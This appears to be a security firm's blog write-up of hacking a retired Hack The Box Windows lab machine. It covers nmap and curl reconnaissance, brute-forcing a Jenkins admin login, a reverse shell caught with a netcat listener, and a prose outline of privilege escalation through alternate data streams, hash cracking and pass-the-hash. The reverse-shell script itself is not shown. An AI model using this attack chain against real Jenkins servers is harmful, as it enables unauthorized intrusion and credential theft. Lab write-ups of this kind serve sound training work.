System Hacked -From Beginning to End.. Priv Escalation not included. Idaho Cyber Security

Good day all

Below is a system we hacked from the beginning to the end without including the priv escalation used to root the system. We want to ensure that we do not make this to easy for the noobs still learning. Please note this was a Windows system that we have done on Hack the box in a LAB which has been retired.

root@Skullack:~# nmap -sV 10.10.10.63 -p- –reason

Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-10 21:43 SAST
Nmap scan report for 10.10.10.63
Host is up, received echo-reply ttl 127 (0.19s latency).
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 – 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

______________________________________________________________________________

Using curl to view source code

root@Skullack:~# curl -i http://10.10.10.63
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 06 Nov 2017 02:34:40 GMT
Accept-Ranges: bytes
ETag: “2277f7cba756d31:0”
Server: Microsoft-IIS/10.0
Date: Tue, 10 Apr 2018 22:54:37 GMT
Content-Length: 503

Ask Jeeves

Web, images, news, and lots of answers. Search Skins

port 5000 showed us the login page of the web page:

http://10.10.10.63:50000/askjeeves/

WHAT IS JENKINS

Jenkins is an open source automation server written in Java. Jenkins helps to automate the non-human part of the software development process, with continuous integration and facilitating technical aspects of continuous delivery. It is a server-based system that runs in servlet containers such as Apache Tomcat

We brute forced the admin login on the web interface and we are in. Going through all the settings we noticed a script console that runs java script. We proceeded to build our script and start a netcat listener to catch the connection back to our attacking system.

Script used: see below image

Starting a Netcat listener on port 8044 and running the script. Below you can see we are logged in to the server running Jenkins by using a malicious java script.

root@Skullack:~# nc -nlvp 8044
listening on [any] 8044 …
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.63] 49723
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator.jenkins>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9

Directory of C:\Users\Administrator.jenkins

04/10/2018 11:06 PM .
04/10/2018 11:06 PM ..
04/10/2018 10:07 PM 48 .owner
04/10/2018 08:43 PM 1,684 config.xml
04/10/2018 11:06 PM 1,353 credentials.xml
04/10/2018 08:43 PM 156 hudson.model.UpdateCenter.xml
11/03/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml
11/03/2017 10:33 PM 1,712 identity.key.enc
11/03/2017 10:46 PM 94 jenkins.CLI.xml
04/10/2018 11:06 PM 148,268 jenkins.err.log
11/03/2017 10:47 PM 360,448 jenkins.exe
11/03/2017 10:47 PM 331 jenkins.exe.config
04/10/2018 08:43 PM 4 jenkins.install.InstallUtil.lastExecVersion
11/03/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state
11/03/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml
12/24/2017 03:38 PM 2,688 jenkins.out.log
04/10/2018 08:42 PM 4 jenkins.pid
11/03/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml
11/03/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml
11/03/2017 10:47 PM 74,271,222 jenkins.war
04/10/2018 08:42 PM 34,147 jenkins.wrapper.log
11/03/2017 10:49 PM 2,881 jenkins.xml
04/10/2018 11:10 PM jobs
11/03/2017 10:33 PM logs
04/10/2018 08:43 PM 907 nodeMonitors.xml
11/03/2017 10:33 PM nodes
11/03/2017 10:44 PM plugins
11/03/2017 10:47 PM 129 queue.xml.bak
11/03/2017 10:33 PM 64 secret.key
11/03/2017 10:33 PM 0 secret.key.not-so-secret
04/10/2018 09:23 PM secrets
04/10/2018 09:03 PM 62 test.bat
04/10/2018 09:12 PM 76 test.ftp
11/08/2017 09:52 AM updates
04/10/2018 10:59 PM userContent
11/03/2017 10:33 PM users
11/03/2017 10:47 PM war
11/03/2017 10:43 PM workflow-libs
04/10/2018 08:49 PM workspace
26 File(s) 74,827,125 bytes
13 Dir(s) 6,945,353,728 bytes free

C:\Users\Administrator.jenkins>

Searching for hidden and alternate data streams on the system. Why? typically we do this to find hidden files and folders that administrators or users setup.

Command = DIR /A:H /R

The Windows privilege escalation ended in finding alternate data streams and then cracking the keypass2 file which contained a long salted hash.

We cracked the hash and was presented with the password. Using a technique called pass the hash which is supposedly to be long dead ( NOT ) worked flawlessly.

Again finding alternate data streams using command dir /R presented us with a hidden text file. We proceeded to read the hidden text file and their we had it we owned the system.

Since we still have new hackers or noobs learning how to do this I have decided to not include the full priv escalation technique used to get root on this system. ( Sorry Noobs but the answer is starring you in the face ).

Hope you enjoyed this post and perhaps learned something from it.

Till next time.

Gerhard De Villiers-Mohr – Senior Ethical Hacker – Secure ICT.

Leave a reply